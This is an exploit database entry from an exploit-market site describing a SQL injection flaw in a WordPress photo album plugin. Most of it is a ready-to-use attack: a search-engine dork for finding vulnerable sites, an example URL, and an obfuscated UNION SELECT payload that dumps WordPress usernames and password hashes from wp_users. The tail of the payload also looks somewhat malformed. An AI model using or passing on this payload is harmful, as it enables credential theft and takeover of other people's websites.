[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Wordpress Photo album Remote SQL Injection Vulnerability

Author
S@BUN
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-2654
Category
web applications
Date add
16-02-2008
Platform
unsorted
========================================================
Wordpress Photo album Remote SQL Injection Vulnerability
========================================================




###############################################################
#
# WordPress album PHOTO SQL Injection
#
################################################################
#
# DORK 1 : allinurl: page_id album "photo"
#
################################################################
EXAMPLE
http://xxxxxxxx/?page_id=13&album= [exploit]
EXPLOIT

S@BUN&photo=-333333%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/from%2F%2A%2A%2Fwp_users/**WHERE%20admin%201=%201



#  0day.today [2024-07-07]  #